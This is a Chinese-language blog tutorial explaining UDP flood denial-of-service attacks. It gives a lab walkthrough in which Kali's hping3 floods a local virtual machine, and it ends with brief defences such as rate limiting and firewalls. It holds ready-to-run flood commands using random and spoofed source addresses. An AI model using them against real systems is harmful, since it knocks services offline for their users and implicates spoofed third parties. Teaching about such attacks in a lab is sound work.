UDP攻击实战及其简略防御方法

理论略解

在正常情况下,server端在特定端口上收到UDP数据包时将通过下面两个步骤进行响应:

1、服务器先检查是否有任何当前监听指定端口请求的程序正在运行

2、如果该端口上没有程序正在接受数据包,则服务器将以ICMP(ping)数据包作为响应,以告知发送方目标不可达

Hacker可以通过“UDP flood”泛洪攻击,实现DOS/DDOS攻击

通过构造大量的UDP数据包发起泛洪攻击来消耗目标的带宽资源,实现拒绝服务攻击也可以说DOS(Denial of Service)

因为目标服务器会利用资源来检查并响应每个接受到的UDP数据包,当收到大量的UDP数据包时,目标资源会很快耗尽,从而导致正常流量拒绝服务。

UDP攻击实战演练

环境:kali、windows(版本自定义),hping3(kali中自带的程序),之后保持虚拟机内局域网中机器互通

附:

hping命令参数解析:

-a 指定源IP;-p 设置目标端口;--udp 采用UDP协议; --flood 采用泛洪模式; --rand-source 采用随机源IP(指每次发包的源IP地址都是随机变化的)

提前打开wireshark进行监听

┌──(root㉿kali)-[~]
└─# hping3 --udp --rand-source --flood -p 666 10.10.10.132

此时返回wireshark查看抓到的udp包,我们可以看到源ip一直变并且端口也是指定的666端口

第二种方法我们可以通过指定源ip来进行流量发包

--fast表示快速发包的意思

┌──(root㉿kali)-[~]
└─# hping3 --udp -a 8.8.8.8 --fast -p 888 10.10.10.132

我们可以看到源ip变为8.8.8.8

实战演练

1、协议禁用

2、限制每秒解多少包

3、写一些路由策略将保丢掉

4、部署安全产品比如抗DDOS、防火墙、IPS等.....

  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值